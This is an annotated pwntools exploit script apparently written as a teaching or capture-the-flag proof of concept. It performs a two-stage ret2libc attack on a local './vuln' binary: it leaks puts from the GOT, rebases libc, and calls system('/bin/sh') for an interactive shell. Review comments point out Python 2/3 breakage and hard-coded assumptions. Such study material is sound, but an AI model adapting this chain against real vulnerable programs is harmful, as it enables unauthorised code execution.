sample_pwn.py
from pwn import *
# Two-stage ret2libc proof-of-concept built on pwntools: stage I leaks the
# resolved address of puts from the GOT, stage II reuses that leak to reach
# system() in the (ASLR-shifted) libc.
# NOTE(review): str and bytes are mixed throughout ("A" * 136 + str(rop), and
# bytes from recvline() padded with a str in ljust) -- this is Python 2-era
# pwntools code; under Python 3 the ljust() call raises TypeError.
context(os='linux', arch='amd64')
r = process("./vuln")   # local target; relative path, so this is cwd-dependent
binary = ELF("./vuln")
rop = ROP(binary)
# Hard-coded libc path and version: the symbol offsets used below are only
# valid for this exact libc build.
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.29.so")
junk = "A" * 136   # presumably the distance to the saved return address; target-specific
# Stage I: call puts on the GOT entry so the process prints the resolved
# libc address, then return to main so a second input can be sent.
# binary.got / binary.symbols are used as absolute addresses, so this
# presumes a non-PIE build -- TODO confirm (PIE would break this stage).
rop.puts(binary.got['puts'])
rop.call(binary.symbols['main'])
log.info("Stage I ROP Chain:\n" + rop.dump())
stageI = junk + str(rop)
r.recvline()   # consume one line of program output before sending (assumed prompt; verify against ./vuln)
r.sendline(stageI)
r.recvline()
# Take the first 8 bytes of the printed GOT entry and zero-pad to a full qword
# so u64() can decode it.
leaked_puts = r.recvline()[:8].strip().ljust(8, "\x00")
log.success("Leaked puts@GLIBCL: "+str(leaked_puts))   # runtime message kept verbatim (note the "GLIBCL" typo)
leaked_puts = u64(leaked_puts)   # rebinds the name from padded bytes to an int
# Rebase libc: ASLR shifts the whole library as a unit, so one leaked symbol
# is enough to fix the base address.
libc.address = leaked_puts - libc.symbols['puts']
# Stage II: build the chain against the rebased libc; the "/bin/sh" string is
# located by searching libc's own memory image.
rop2 = ROP(libc)
rop2.system(next(libc.search('/bin/sh\x00')))
log.info("Stage II ROP Chain:\n" + rop2.dump())
stageII = junk + str(rop2)
r.recvline()   # same prompt handling as stage I (assumed)
r.sendline(stageII)
r.recvline()
r.interactive()   # hand the process I/O over to the user